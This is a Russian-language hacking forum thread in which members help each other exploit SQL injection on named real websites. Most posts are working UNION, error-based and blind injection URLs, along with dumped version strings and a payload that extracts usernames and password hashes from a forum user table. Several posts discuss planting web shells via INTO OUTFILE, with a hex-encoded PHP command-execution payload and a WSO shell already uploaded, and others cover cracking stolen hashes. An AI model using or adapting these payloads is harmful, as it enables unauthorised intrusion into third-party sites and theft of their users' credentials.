как сделать чтобы вывело данные?
qaz said:
выводит Subquery returns more than 1 row
как сделать чтобы вывело данные?
А зачем?
Там можно без ErrorBased обойтись.
http://www.zoo-friend.ru/?m=292&action=show_item&id=3020'+and+user()=database()+union+select+1,2,3, 4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26--%20a
Facecontrol
24.03.2012, 17:42
Покажите пожалуйста сайт для примера на котором есть слепая sql-inj и выведите информпцию к примеру version.Это мне для треннировки надо,чтоб я понял.
народ, подскажите, тут можно както чёнибуть вывести?
http://venec.ulstu.ru/lib/go.php?id=2151+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22--+
winstrool
24.03.2012, 20:35
qaz said:
народ, подскажите, тут можно както чёнибуть вывести?
http://venec.ulstu.ru/lib/go.php?id=2151+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22--+
Можешь использовать как блинд.
qaz said:
народ, подскажите, тут можно както чёнибуть вывести?
http://venec.ulstu.ru/lib/go.php?id=2151+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22--+
http://venec.ulstu.ru/lib/go.php?id=2151-9999999.9+union+select+1,2,3,4,5,6,7,8,9,12313212, 11,12,13,14,15,16,17,18,19,20,21,22--+
Только не вывел ничего(
блин,
а тут http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404+limit+0,0+union+select+1,2,3,4,table_name, 6,7,8,9,10,11+from+information_schema.tables--+
чего таблици не выводит?
http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10, 11+from+information_schema.tables+limit+0,1--+d
Конечно, limit 0,0 сделал.
HAXTA4OK
24.03.2012, 21:33
http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6, 7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,1 4,15,16,17,18,19,20,21,22--
Файл ./4.1.2-alpha не найден.
не?
HAXTA4OK said:
http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6, 7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,1 4,15,16,17,18,19,20,21,22--
не?
ну ты и мозг)))
а тут
http://www.fanfics.ru/read.php?id=3&chapter=-616'
ошибка есть, что не подставлю она пропадает, как быть?
HAXTA4OK
24.03.2012, 22:06
Ruslan1817 said:
http://www.fanfics.ru/read.php?id=3&chapter=-616'and(select*from(select(name_const(version(),1) ),name_const(version(),1))a)and(1)='1
https://rdot.org/forum/showthread.php?t=60&page=2
какой там вывод? или я в шары долблюсь?
HAXTA4OK said:
какой там вывод? или я в шары долблюсь?
норм. вывод '5.1.45'
smirk said:
норм. вывод '5.1.45'
чёт непойму где ты там вывод нашол? у меня как небыло так и нету
Пробелы постирайте))
Продажа любых мобильных телефонов Samsung в интернет-магазине SotMarketERROR: 1060 - Duplicate column name '
5.1.45
'
SELECT * FROM saled_links WHERE uri = '/read.php?id=3&chapter=-616'and(select*from(select(name_const(version(),1) ),name_const(version(),1))a)and(1)='1'
Выбор ссылки
stepashka_
24.03.2012, 23:41
qaz said:
чёт непойму где ты там вывод нашол? у меня как небыло так и нету
http://s019.radikal.ru/i620/1203/25/d1d4f9227d4d.jpg
qaz said:
чёт непойму где ты там вывод нашол? у меня как небыло так и нету
Потому что скуля там не в GET-параметре, а в URI:
http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11
А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
Tigger said:
Потому что скуля там не в GET-параметре, а в URI:
http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11
А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.
qaz said:
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
Все выводиться, WHERE убери =\
winstrool
25.03.2012, 00:54
qaz said:
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
Facecontrol
25.03.2012, 03:12
А на мой вопрос кто нибудь ответит?
Facecontrol said:
А на мой вопрос кто нибудь ответит?
для кого это (https://antichat.live/threads/21336/) тема?
там море ссылок
http://site.com/about.php?page='
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1[SELECT namemap.info_hash as hash, namemap.filename, namemap.url, namemap.poster, namemap.data, categories.name as cname, namemap.category as catid FROM namemap LEFT JOIN categories ON categories.id = namemap.category WHERE namemap.status=1 ORDER BY data DESC LIMIT -20, 20]
Is that sql vuln ?
Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...
My tries:
Code:
http://site.com/about.php?page=')+order+by+13--+-
http://site.com/about.php?page='+order+by+13--+-
http://site.com/about.php?page=' order by 13
But there is no change...
Any ideas ?
BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...
Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
Sad face
Thanks for the info
Tigger said:
Все выводиться, WHERE убери =\
та то я нечаёно оставил, забыл вытереть прежде чем запостить
winstrool said:
После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
да и так пробовал, вабще колонки выводить нехочет
winstrool
25.03.2012, 13:56
qaz said:
та то я нечаёно оставил, забыл вытереть прежде чем запостить
да и так пробовал, вабще колонки выводить нехочет
Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554
_http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,group_concat(column_name),13,14, 15,16,17,18,19,20,21+from+information_schema.colum ns+where+table_name=0x494e4e4f44425f434d505f524553 4554+limit+0,1--+
такс, тут ещо проблема
http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+column_name+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273+limit+19000,1%29,0x00,floor%28ran d%280%29*2%29%29x+from+information_schema.tables+g roup+by+x%29a%29--+
таблици вывело нормально
отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая)
и
нхочет вобще выводить колонки и инфу из torrenthpbb_users:1551912
ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
qaz said:
ну пустой она быть нможет так как там всётак есть форум с юзерами))
Так не убеждаются, убеждаются так:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count (*),concat((select+concat(count(*),0x00)+from+phpb b_users+limit+0,1),floor(rand(0)*2))x+from+informa tion_schema.tables+group+by+x)a)--+f
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count (*),concat((select+concat(count(*),0x00)+from+xbt_ users+limit+0,1),floor(rand(0)*2))x+from+informati on_schema.tables+group+by+x)a)--+f
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей.
А вот и вывод:
Code:
http://torrnado.ru/peerlist.php?id=982+or+(@:=1)||@+group+by+concat(( select+substr(concat_ws(0x3a,username,user_passwor d),1,100)+from+phpbb_users+limit+1,1),@:=@-1)having+@||min(@:=0)--+f
...
Ereee said:
Так не убеждаются, убеждаются так:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count (*),concat((select+concat(count(*),0x00)+from+phpb b_users+limit+0,1),floor(rand(0)*2))x+from+informa tion_schema.tables+group+by+x)a)--+f
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count (*),concat((select+concat(count(*),0x00)+from+xbt_ users+limit+0,1),floor(rand(0)*2))x+from+informati on_schema.tables+group+by+x)a)--+f
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей.
ну так я же и написал
отсюда torrent:xbt_users:1567810
torrenthpbb_users:1551912
чё ето за чудо конструкция такая?
(@:=1)||@
где в муналах по sql я про неё могу почитать
qaz said:
чё ето за чудо конструкция такая?
(@:=1)||@
где в муналах по sql я про неё могу почитать
Переменные, как не сложно догадатся.
http://www.scientific-work.ru/index.php?id=303+union+select+1,2,3,4,5,6,7,8,9,10--+
тут не пойму как данные вывести
что не подставлю лимит или - пишет что не такой страници
и тут тоже
http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
Cennarios
25.03.2012, 17:54
http://www.scientific-work.ru/index.php?id=-303+union+select+1,2,3,4,5,6,7,version(),0x1,10--+ Вот так. Данные при редиректе в строке URL.
qaz said:
и тут тоже
http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
Вывода нет походу:
http://www.ivrus.biz/showcat.php?id=7-9999999.9+union+select+user(),user(),user()--+f
Но за то, можно заюзать как XSS.
http://board.ugmk.info/?rub=topic&page=3144&from=943260
а тут как? что не подставлю постоянно ошибка
qaz said:
http://board.ugmk.info/?rub=topic&page=3144&from=943260
а тут как? что не подставлю постоянно ошибка
В LIMITе там, не раскрутишь.
Крути эту:
http://board.ugmk.info/?b=1332679205
Ereee said:
В LIMITе там, не раскрутишь.
Крути эту:
http://board.ugmk.info/?b=1332679205
ок, а тут как?
http://baratro.ru/subcat.php?id=22'
таже самая проблема
qaz said:
ок, а тут как?
http://baratro.ru/subcat.php?id=22'
таже самая проблема
Там легко же... =\
Cennarios
25.03.2012, 18:27
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
А вообще вот так:
http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.use r--+
можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.
lightangel
25.03.2012, 18:44
I need help on this one.
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky.
lightangel said:
I need help on this one.
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky.
http://allbahrain.com/list_resturant_menu.php?resturant=1+and+substring( version(),1,1)=5--+f
Cennarios said:
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
хм.. действительно
Ereee said:
Там легко же... =\
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
qaz said:
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
Ereee said:
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
никак, ет типа получается ещо один вид выода чарез ошибку?
qaz said:
хм.. действительно
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Зачем использование переменных?
Вот все выводит:
http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),f loor(rand(0)*2))having(min(0))or(1)and'
Твой запрос не работает из-за комментария:
http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*) ,concat((select+concat(version(),0x3a)+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)and'
Вместо and', тот, что на конце можно использовать 100500 вариантов:
-- a
and'
and'1'='1
%23
И т.д...
Привет
Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+
+ так и выводится в ошибке как плюс
Пробовал /**/ - режется
%09...%20 и т.д. так-же выводятся в ошибке как есть
PHP:
SELECT*FROM users WHERE link='admin'--+'
You have an error in your SQL syntax; chec k the manual that corresponds to your MySQL server version for the right syntax to us e near '''at line 1
Попробуй:
PHP:
SELECT*FROM users WHERE link='admin'and'1'='1
Ereee said:
Попробуй:
PHP:
SELECT*FROM users WHERE link='admin'and'1'='1
Не прокатывает.
PHP:
SELECT*FROM users WHERE link='admin'+and+1='1'
You have an error in your SQL syntax;check the manual that corresponds to your MySQL server versionforthe right syntax tousenear'an d+1='1''at line 1
PHP:
SELECT*FROM users WHERE link='admin'and'1'=(к вычка)1
попробуй так ещё
Byrger,не поверишь!
Я писал пост так:
Попробуй:
[php*]SELECT * FROM users WHERE link = 'admin' and '1'='1[/php*]
Но вывелось:
PHP:
SELECT*FROM users WHERE link='admin'and'1'='1
Кавычка пропала, баг форума... Юзай:
Code:
SELECT * FROM users WHERE link = 'admin' and '1'='1
anonym_di
27.03.2012, 23:25
Народ буду благодарен тому кто мне подскажет как можно обойти вот это
Code:
http://www.mk.gov.kz/?lang=kaz&id_open_rubric=469
Ereee said:
Byrger,
не поверишь!
Я писал пост так:
Но вывелось:
PHP:
SELECT*FROM users WHERE link='admin'and'1'='1
Кавычка пропала, баг форума... Юзай:
Code:
SELECT * FROM users WHERE link = 'admin' and '1'='1
Прочитай мой пост, я так и попробовал...
и '1'='1
и 1='1
где можно скачать исходники этого движка? или купить.
кстате что за двиг rangehoodsupply.com
www.xxxxx.com/watch/922/ashot/
Blind SQL Injection
Attack details
Cookie input RNLBSERVERID was set to -1" or "49"="49
Cookie: sid=1; is_pc=1; country=IL; RNLBSERVERID=-1%22 or 49 %3D %2246; bg=plainBlack; no_history_cookie=1 X-Requested-With: XMLHttpRequest
подскажите с чего начать
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
nikaw87 said:
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
nikaw87 said:
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.
OxoTnik,
я не думаю, что картинки инклудят.
OxoTnik said:
Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
Заливал... также тянул-просто черное изображение( жаль...
Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
Facecontrol
28.03.2012, 18:28
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
Cennarios
28.03.2012, 18:48
Facecontrol said:
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin
PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
попробуй перевести в HEX
получится так
Code:
0x3c3f2073797374656d28245f4745545b636d645d293b203f 3e
хотя не получится
GaMeSTeR
28.03.2012, 20:58
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
здесь экстрасенсов нету,сылку в студию
Facecontrol
28.03.2012, 21:14
А можно ли через файл.css залить шелл?
Facecontrol said:
А можно ли через файл.css залить шелл?
http://i171.photobucket.com/albums/u302/henri999/noooo1.gif
Facecontrol
28.03.2012, 21:59
Почему я немогу зайти на сайт вводя любые из этих данных? http://www.sotovip.biz/phone.php?id=573+and+1=0+UNION+SELECT+1,group_conc at(0x2,id,0x2,login,0x2,pass,0x2)+from+users+--+
Facecontrol said:
Почему я немогу зайти на сайт вводя любые из этих данных? http://www.sotovip.biz/phone.php?id=573+and+1=0+UNION+SELECT+1,group_conc at(0x2,id,0x2,login,0x2,pass,0x2)+from+users+--+
потому что пароли в DES.
Facecontrol
28.03.2012, 22:14
d1v said:
потому что пароли в DES.
А как его раскодировать
Facecontrol said:
А как его раскодировать
http://forum.antichat.net/thread259411.html
Залил шелл wso, была необходимость создать файл .htaccess
Теперь ни шелл ни сайт не открываются. Вылазиет ошибка
"IISPassword
The page cannot be displayed"
Что можно сделать?
Га-Ноцри
28.03.2012, 23:51
Chuvash said:
Залил шелл wso, была необходимость создать файл .htaccess
Теперь ни шелл ни сайт не открываются. Вылазиет ошибка
"IISPassword
The page cannot be displayed"
Что можно сделать?
Но ведь IIS не Апач, и .htaccess'oм все равно ничего нельзя добиться. Правда, вроде нагуглил аналог - web.config, в который можно импортировать часть настроек .htaccess, если не ошибаюсь, конечно.
Га-Ноцри said:
Но ведь IIS не Апач, и .htaccess'oм все равно ничего нельзя добиться. Правда, вроде нагуглил аналог - web.config, в который можно импортировать часть настроек .htaccess, если не ошибаюсь, конечно.
Да у меня скрипт 1 не запускался надо было кое-что подправить в htaccess Во ттеперь думаю мож как нибудь получить доступ через фтп чтоб удалить файл. Можно как то получить доступ к фтп через шелл лежащий на соседнем сайте? чтобы удалить файл htaccess
Га-Ноцри
29.03.2012, 00:11
Chuvash said:
Да у меня скрипт 1 не запускался надо было кое-что подправить в htaccess Во ттеперь думаю мож как нибудь получить доступ через фтп чтоб удалить файл. Можно как то получить доступ к фтп через шелл лежащий на соседнем сайте? чтобы удалить файл htaccess
У меня подобное было, когда я накосячил с правкой .htaccess'а - вместо редиректа мобильных устройств на лендинг, редирект "случился" у всех, кто заходил на сайт, включая и стационарные компьютеры, лол. Ничего, вернулся админ, почистил .htaccess, шелл не удалил, естесственно. Так что подожди денек, починят А насчет паролей от ftp - это вопрос к знатокам
Га-Ноцри said:
У меня подобное было, когда я накосячил с правкой .htaccess'а - вместо редиректа мобильных устройств на лендинг, редирект "случился" у всех, кто заходил на сайт, включая и стационарные компьютеры, лол. Ничего, вернулся админ, почистил .htaccess, шелл не удалил, естесственно. Так что подожди денек, починят
А насчет паролей от ftp - это вопрос к знатокам
Спасибо буду ждать, владельцы сайта надеюсь до админов достучатся, а то по логам админы давно не лазили на сайте.
skagen said:
подскажите пожалуйста тулзу для определения количества строк в скуле, например
_http://Сайт/index.php?id=-1+UNION+SELECT+null,null,null,null
сколько раз нужно здесь писать null? мне не нужны проги для раскручивания скули. я хочу сам научиться раскручивать их. или подскажите другой способ определения количества строк.спасибо
order by
group by
skagen said:
Ну а как можно это автоматизировать? ведь если строк больше 50, это уже гемор
/thread240692.html
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
GaMeSTeR
29.03.2012, 06:34
Faaax said:
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
Вот писал под себя:
http://www.sendspace.com/file/7h37av
В поле Number пишется либо число колонок либо вставляется ссылка вида http://site.com/index.php?id=1+ORDER+BY+5+--+ если нажать на поле и в буфере будет ссылка такого вида то она автоматически замениться на http://site.com/index.php?id=1+aNd+1=0+UNION+SELECT+1,2,3,4,5+--+
GaMeSTeR
29.03.2012, 07:18
GaMeSTeR said:
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Faaax said:
здесь экстрасенсов нету,сылку в студию
" if author else f"
GaMeSTeR said:
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Faaax said:
здесь экстрасенсов нету,сылку в студию
Не хотел светить, но чтобы набраться опыта готов пожертвовать)
http://www.ibs.ua/card.php?id=3182+aNd+'1'='0'+UNION+SELECT+version( ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+
Все перепробовал но путь до сайта найти не могу, помогите!
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Code:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
GaMeSTeR
29.03.2012, 11:39
Faaax said:
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Code:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
Думаю не получиться там фильтрация + если фильтрацию проходим то дописываемся после from'a:
SELECT * ....... from tv1000_db.[sql]_peredacha
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
qaz said:
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
Code:
_http://www.imperiya.by/news.html
?id=69799+and+1=(if(ascii(substr(version(),1,1))=5 3,1,0))--+
как слепую, вывод в заголовке. версия 5.+
помогите ребята
есть Error:
Code:
http://domain.dm/?s11='
и вывод:
Code:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Code:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить?
GaMeSTeR
29.03.2012, 20:34
\/ITA said:
помогите ребята
есть Error:
Code:
http://domain.dm/?s11='
и вывод:
Code:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Code:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить?
Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot